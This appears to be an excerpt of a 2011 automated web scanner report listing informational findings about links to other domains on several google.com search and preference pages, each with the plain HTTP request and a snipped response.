...[SNIP]...
<li><a href="http://www.google.ad"><span class="ad">
...[SNIP]...
<li><a href="http://www.google.ae"><span class="ae">
...[SNIP]...
<li><a href="http://www.google.am"><span class="am">
...[SNIP]...
<li><a href="http://www.google.as"><span class="as">
...[SNIP]...
<li><a href="http://www.google.at"><span class="at">
...[SNIP]...
<li><a href="http://www.google.az"><span class="az">
...[SNIP]...
<li><a href="http://www.google.ba"><span class="ba">
...[SNIP]...
<li><a href="http://www.google.be"><span class="be">
...[SNIP]...
<li><a href="http://www.google.bf"><span class="bf">
...[SNIP]...
<li><a href="http://www.google.bg"><span class="bg">
...[SNIP]...
<li><a href="http://www.google.bi"><span class="bi">
...[SNIP]...
<li><a href="http://www.google.bj"><span class="bj">
...[SNIP]...
<li><a href="http://www.google.bs"><span class="bs">
...[SNIP]...
<li><a href="http://www.google.by"><span class="by">
...[SNIP]...
<li><a href="http://www.google.ca"><span class="ca">
...[SNIP]...
<li><a href="http://www.google.cd"><span class="cd">
...[SNIP]...
<li><a href="http://www.google.cf"><span class="cf">
...[SNIP]...
<li><a href="http://www.google.cg"><span class="cg">
...[SNIP]...
<li><a href="http://www.google.ch"><span class="ch">
...[SNIP]...
<li><a href="http://www.google.ci"><span class="ci">
...[SNIP]...
<li><a href="http://www.google.cl"><span class="cl">
...[SNIP]...
<li><a href="http://www.google.cm"><span class="cm">
...[SNIP]...
<li><a href="http://www.google.cn"><span class="cn">
...[SNIP]...
<li><a href="http://www.google.cz"><span class="cz">
...[SNIP]...
<li><a href="http://www.google.de"><span class="de">
...[SNIP]...
<li><a href="http://www.google.dj"><span class="dj">
...[SNIP]...
<li><a href="http://www.google.dk"><span class="dk">
...[SNIP]...
<li><a href="http://www.google.dm"><span class="dm">
...[SNIP]...
<li><a href="http://www.google.dz"><span class="dz">
...[SNIP]...
<li><a href="http://www.google.ee"><span class="ee">
...[SNIP]...
<li><a href="http://www.google.es"><span class="es">
...[SNIP]...
<li><a href="http://www.google.fi"><span class="fi">
...[SNIP]...
<li><a href="http://www.google.fm"><span class="fm">
...[SNIP]...
<li><a href="http://www.google.fr"><span class="fr">
...[SNIP]...
<li><a href="http://www.google.ga"><span class="ga">
...[SNIP]...
<li><a href="http://www.google.ge"><span class="ge">
...[SNIP]...
<li><a href="http://www.google.gg"><span class="gg">
...[SNIP]...
<li><a href="http://www.google.gl"><span class="gl">
...[SNIP]...
<li><a href="http://www.google.gm"><span class="gm">
...[SNIP]...
<li><a href="http://www.google.gp"><span class="gp">
...[SNIP]...
<li><a href="http://www.google.gr"><span class="gr">
...[SNIP]...
<li><a href="http://www.google.gy"><span class="gy">
...[SNIP]...
<li><a href="http://www.google.hn"><span class="hn">
...[SNIP]...
<li><a href="http://www.google.hr"><span class="hr">
...[SNIP]...
<li><a href="http://www.google.ht"><span class="ht">
...[SNIP]...
<li><a href="http://www.google.hu"><span class="hu">
...[SNIP]...
<li><a href="http://www.google.ie"><span class="ie">
...[SNIP]...
<li><a href="http://www.google.im"><span class="im">
...[SNIP]...
<li><a href="http://www.google.is"><span class="is">
...[SNIP]...
<li><a href="http://www.google.it"><span class="it">
...[SNIP]...
<li><a href="http://www.google.je"><span class="je">
...[SNIP]...
<li><a href="http://www.google.jo"><span class="jo">
...[SNIP]...
<li><a href="http://www.google.ki"><span class="ki">
...[SNIP]...
<li><a href="http://www.google.kg"><span class="kg">
...[SNIP]...
<li><a href="http://www.google.kz"><span class="kz">
...[SNIP]...
<li><a href="http://www.google.la"><span class="la">
...[SNIP]...
<li><a href="http://www.google.li"><span class="li">
...[SNIP]...
<li><a href="http://www.google.lk"><span class="lk">
...[SNIP]...
<li><a href="http://www.google.lt"><span class="lt">
...[SNIP]...
<li><a href="http://www.google.lu"><span class="lu">
...[SNIP]...
<li><a href="http://www.google.lv"><span class="lv">
...[SNIP]...
<li><a href="http://www.google.md"><span class="md">
...[SNIP]...
<li><a href="http://www.google.me"><span class="me">
...[SNIP]...
<li><a href="http://www.google.mg"><span class="mg">
...[SNIP]...
<li><a href="http://www.google.mk"><span class="mk">
...[SNIP]...
<li><a href="http://www.google.ml"><span class="ml">
...[SNIP]...
<li><a href="http://www.google.mn"><span class="mn">
...[SNIP]...
<li><a href="http://www.google.ms"><span class="ms">
...[SNIP]...
<li><a href="http://www.google.mu"><span class="mu">
...[SNIP]...
<li><a href="http://www.google.mv"><span class="mv">
...[SNIP]...
<li><a href="http://www.google.mw"><span class="mw">
...[SNIP]...
<li><a href="http://www.google.ne"><span class="ne">
...[SNIP]...
<li><a href="http://www.google.nl"><span class="nl">
...[SNIP]...
<li><a href="http://www.google.no"><span class="no">
...[SNIP]...
<li><a href="http://www.google.nr"><span class="nr">
...[SNIP]...
<li><a href="http://www.google.nu"><span class="nu">
...[SNIP]...
<li><a href="http://www.google.pl"><span class="pl">
...[SNIP]...
<li><a href="http://www.google.pn"><span class="pn">
...[SNIP]...
<li><a href="http://www.google.ps"><span class="ps">
...[SNIP]...
<li><a href="http://www.google.pt"><span class="pt">
...[SNIP]...
<li><a href="http://www.google.ro"><span class="ro">
...[SNIP]...
<li><a href="http://www.google.ru"><span class="ru">
...[SNIP]...
<li><a href="http://www.google.rw"><span class="rw">
...[SNIP]...
<li><a href="http://www.google.sc"><span class="sc">
...[SNIP]...
<li><a href="http://www.google.se"><span class="se">
...[SNIP]...
<li><a href="http://www.google.sh"><span class="sh">
...[SNIP]...
<li><a href="http://www.google.si"><span class="si">
...[SNIP]...
<li><a href="http://www.google.sk"><span class="sk">
...[SNIP]...
<li><a href="http://www.google.sn"><span class="sn">
...[SNIP]...
<li><a href="http://www.google.sm"><span class="sm">
...[SNIP]...
<li><a href="http://www.google.st"><span class="st">
...[SNIP]...
<li><a href="http://www.google.td"><span class="td">
...[SNIP]...
<li><a href="http://www.google.tg"><span class="tg">
...[SNIP]...
<li><a href="http://www.google.tk"><span class="tk">
...[SNIP]...
<li><a href="http://www.google.tl"><span class="tl">
...[SNIP]...
<li><a href="http://www.google.tm"><span class="tm">
...[SNIP]...
<li><a href="http://www.google.to"><span class="to">
...[SNIP]...
<li><a href="http://www.google.tt"><span class="tt">
...[SNIP]...
<li><a href="http://www.google.vg"><span class="vg">
...[SNIP]...
<li><a href="http://www.google.vu"><span class="vu">
...[SNIP]...
<li><a href="http://www.google.ws"><span class="ws">
...[SNIP]...
<li><a href="http://www.google.rs"><span class="rs">
...[SNIP]...

16.105. http://www.google.com/prdhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /prdhp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /prdhp?q=bluefin+tuna&hl=en&tab=nf HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<noscript><meta http-equiv=refresh content="0; URL=/prdhp?q=bluefin+tuna&hl=en&ta
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=f1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.106. http://www.google.com/preferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /preferences

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /preferences?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.107. http://www.google.com/quality_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /quality_form

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /quality_form?q=ipboard+software&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:13:19 GMT
Server: gws
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"LwFKTdPdOZmWeOT8_N0P",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&hl=en&prmd=ivns&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.108. http://www.google.com/realtime  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /realtime

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /realtime?q=bluefin+tuna&hl=en&tab=nY HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="See up-to-the-second social updates about hot topics around the world.">
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=Y1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.109. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=ipboard+software&hl=en&prmd=ivns&ei=rtlJTei7OYL6lweT2cU3&start=10&sa=N HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"uf9JTdGYFsKBlAed0cEO",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&hl=en&prmd=ivns&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.forum-software.org/ipboard/review" class=l onmousedown="return clk(this.href,'','','','11','','0CBIQFjAAOAo')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pUQ4vXCPXOgJ:www.forum-software.org/ipboard/review+ipboard+software&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','21','','0CBQQIDAKOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ipboard.software.informer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CBUQFjABOAo')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RxQeAWA8CNQJ:ipboard.software.informer.com/+ipboard+software&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','22','','0CBcQIDALOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.orthougm.com/software_ip_board.html" class=l onmousedown="return clk(this.href,'','','','13','','0CBgQFjACOAo')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TmFgkHUs2dUJ:www.orthougm.com/software_ip_board.html+ipboard+software&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','23','','0CBoQIDAMOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.123flashchat.com/ipb-post-notifier.html" class=l onmousedown="return clk(this.href,'','','','14','','0CBsQFjADOAo')">Free <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wz_j-7U-cZMJ:www.123flashchat.com/ipb-post-notifier.html+ipboard+software&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','24','','0CB0QIDANOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.chinahistoryforum.com/index.php?/topic/34753-forum-software-upgraded-to-ipb-313/" class=l onmousedown="return clk(this.href,'','','','15','','0CB4QFjAEOAo')">Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MgPA2foEQz0J:www.chinahistoryforum.com/index.php%3F/topic/34753-forum-software-upgraded-to-ipb-313/+ipboard+software&amp;cd=15&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:MgPA2foEQz0J:www.chinahistoryforum.com/index.php%3F/topic/34753-forum-software-upgraded-to-ipb-313/+ipboard+software&cd=15&hl=en&ct=clnk&gl=us&source=www.google.com','','','','25','','0CCAQIDAOOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.theadminzone.com/forums/showthread.php?t=76012" class=l onmousedown="return clk(this.href,'','','','16','','0CCEQFjAFOAo')">Free Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:oGADvRe4V90J:www.theadminzone.com/forums/showthread.php%3Ft%3D76012+ipboard+software&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:oGADvRe4V90J:www.theadminzone.com/forums/showthread.php%3Ft%3D76012+ipboard+software&cd=16&hl=en&ct=clnk&gl=us&source=www.google.com','','','','26','','0CCgQIDAPOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.devcomments.com/Scripts-amp-Software-IP-Board-Standard-License-to356318.htm" class=l onmousedown="return clk(this.href,'','','','17','','0CCkQFjAGOAo')">Scripts &amp; <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tFt8vsKtHCcJ:www.devcomments.com/Scripts-amp-Software-IP-Board-Standard-License-to356318.htm+ipboard+software&amp;cd=17&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','27','','0CC0QIDAQOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dl4all.com/2007/12/28/invision-power-board-2.3.3-retail.html" class=l onmousedown="return clk(this.href,'','','','18','','0CC4QFjAHOAo')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HvB4QopzwQkJ:www.dl4all.com/2007/12/28/invision-power-board-2.3.3-retail.html+ipboard+software&amp;cd=18&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','28','','0CDAQIDAROAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/gallery/" class=l onmousedown="return clk(this.href,'','','','19','','0CDIQFjAIOAo')">IP.Gallery - Integrated Gallery <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:76X_ncmJly8J:www.invisionpower.com/products/gallery/+ipboard+software&amp;cd=19&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','29','','0CDQQIDASOAo')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.objectivistliving.com/forums/index.php?showtopic=862" class=l onmousedown="return clk(this.href,'','','','20','','0CDYQFjAJOAo')">Navigation Tips - Intro to <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jaNTx2jKFDQJ:www.objectivistliving.com/forums/index.php%3Fshowtopic%3D862+ipboard+software&amp;cd=20&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jaNTx2jKFDQJ:www.objectivistliving.com/forums/index.php%3Fshowtopic%3D862+ipboard+software&cd=20&hl=en&ct=clnk&gl=us&source=www.google.com','','','','30','','0CDoQIDATOAo')">Cached</a>
...[SNIP]...

16.110. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?hl=en&q=+site:MWJ_5AKtpypmg8&ved=0CDAQrAM HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>site:MWJ_5AKtpypmg8 - Google Search</title><script>window.google={kEI:"x_9JTfH7IMX6lwf97qQL",kEXPI:"17259,1
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=site:MWJ_5AKtpypmg8&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.111. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ipboard+software HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:24:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/GeNLY2f-.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 56508

<!doctype html><head><title>ipboard software - Google Search</title><script>window.google={kEI:"rtlJTei7OYL6lweT2cU3",kEXPI:"17259,17291,27615,27683,28068,28187,28387,28402",kCSI:{e:"17259,17291,27615
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/board/" class=l onmousedown="return clk(this.href,'','','','1','','0CBMQFjAA')">Community Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBgQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CBoQFjAB')">Community &amp; Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7ETs2caA0eMJ:www.invisionpower.com/+ipboard+software&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CB8QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ipboard-software.software.informer.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CCIQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rwIJ10wJfloJ:ipboard-software.software.informer.com/+ipboard+software&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCcQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.julong.com.cn/en/News/188.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCgQFjAD')">Release of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6zPAbdiM6HsJ:www.julong.com.cn/en/News/188.html+ipboard+software&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CC0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Invision_Power_Board" class=l onmousedown="return clk(this.href,'','','','5','','0CC8QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L3-QgO6ibUgJ:en.wikipedia.org/wiki/Invision_Power_Board+ipboard+software&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.forum-software.org/tag/ipboard" class=l onmousedown="return clk(this.href,'','','','6','','0CDYQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qnHi427Jq2oJ:www.forum-software.org/tag/ipboard+ipboard+software&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CDsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://search.wareseeker.com/ip-board/" class=l onmousedown="return clk(this.href,'','','','7','','0CDwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y9-HsmKodEEJ:search.wareseeker.com/ip-board/+ipboard+software&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=13" class=l onmousedown="return clk(this.href,'','','','8','','0CEUQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com','','','','8','','0CEoQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software" class=l onmousedown="return clk(this.href,'','','','9','','0CEwQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:odF-vkzGMi8J:www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software+ipboard+software&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf" class=l onmousedown="return clk(this.href,'','','','10','','0CFMQFjAJ')"><em>
...[SNIP]...

16.112. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=ipboard+software&hl=en&prmd=ivns&tbo=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"r_9JTa7CFsH7lwed18zkDw",kEXPI:"17259,17
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&hl=en&prmd=ivns&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/board/" class=l onmousedown="return clk(this.href,'','','','1','','0CCMQFjAA')">Community Forum <em>
...[SNIP]...
